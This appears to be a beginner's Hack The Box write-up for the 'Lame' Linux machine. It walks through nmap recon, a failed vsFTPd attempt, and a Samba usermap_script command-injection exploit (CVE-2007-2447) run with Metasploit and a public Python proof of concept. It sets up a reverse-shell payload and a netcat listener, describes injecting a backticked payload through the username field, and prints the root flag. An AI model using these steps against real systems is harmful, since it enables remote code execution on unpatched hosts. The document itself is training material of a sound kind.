LAME — HTB
Lame is a beginner-friendly machine based on a Linux platform.
IP: 10.10.10.3
This machine can be exploited by both metasploit and manual approach .
Recon
Nmap:
- Used -Pn for making ping request as without it was not giving proper output.
- * Two section where exploit can be done
* one vsFTP 2.3.4 & other samba 3.0.20
FTP exploitation:
- * Using vsFTPd 2.3.4
* Make a connection ftp
* ftp 10.10.10.3
* ftp anonymous
* Enter any password . YOu will able to login but nothing happen manually.
* How to use FTP (Beginners Guide) — Qode Interactive — For ftp - Used metasploit :
- Exploit run successfully but no session , machine was getting. Again failed.
PYTHON SCRIPT:
Some Googling led me to this GitHub with a Python POC for the exploit. I can get a shell easily, by following the “install” instructions and then running the script:
* sudo apt install python python-piphttps://github.com/amriunix/CVE-2007-2447.git
* pip install --user pysmb
* git clone
- $ python usermap_script.py <RHOST> <RPORT> <LHOST> <LPORT>
• RHOST -- The target address
• RPORT -- The target port (TCP : 139)
• LHOST -- The listen address
• LPORT -- The listen port
- Listen netcat at the your mentioned port.
- cat root/root.txt — get the flag
Samba Exploitation: Metasploit
Samba is an extremely useful networking tool for anyone who has both Windows and Unix systems on his network. Running on a Unix system, it allows Windows to share files and printers on the Unix host, and it also allows Unix users to access resources shared by Windows systems.
It provide ftp like interface in command line.
Exploit: This module exploits a command execution vulerability in Samba
versions 3.0.20 through 3.0.25rc3 when using the non-default
"username map script" configuration option. By specifying a username
containing shell meta characters, attackers can execute arbitrary
commands.
No authentication is needed to exploit this vulnerability since
this option is used to map usernames prior to authentication!
- We can exploit both manual & by metasploit
• First using metasploit
• Open msfconsole
• search samba 2.3.0
• use 14 or exploit/multi/samba/usermap_script
• set payload set payload cmd/unix/reverse
• show options
• Set RHOSTS & LHOST
• Check out the port as it should be 139 as at namp result samba is listening at 139.
• We receive the session of victime machine.
- * cd root & cat root.txt
* final flag: 256c41e62eac379edf6df4dac5e12d38
Samba exploit : Mannual Approach
- For list of commands:
https://www.computerhope.com/unix/smbclien.html - smbclient -L 10.10.10.3
- * To short this issue: sudo vi /etc/samba/smb.conf
* Under global section add : client max protocol = NT1
* after changing this issue was displaying.
- * Under global section edit : client min protocol = NT1
* Issue get ressolved.
* smbclient -L 10.10.10.3
- * Enumerate the temp folder.USE enum4linux
* A Linux alternative to enum.exe for enumerating data from Windows and Samba hosts.
Enum4linux is a tool for enumerating information from Windows and Samba systems.
enum4linux | Penetration Testing Tools (kali.org)
- So, we are right. We are able to map to /tmp folder. Then now, we will try to connect to the that folder.
* now smbclient //10.10.10.3/tmp
* after login . Enter help
* We can out that logon command is there & we can use to login using logon command.
- * Samba exploit after reading this you can understand a little bit more.
https://www.exploit-db.com/exploits/16320
The key part is indef exploitat the bottom. It is creating an SMB session using:
• username =/=`nohup [payload]`
• password = random 16 characters
• domain = user provided domain.
Conclusion & learning:
- Samba in details & exploitation.
- enum4linux tool.
- FTP exploitation.
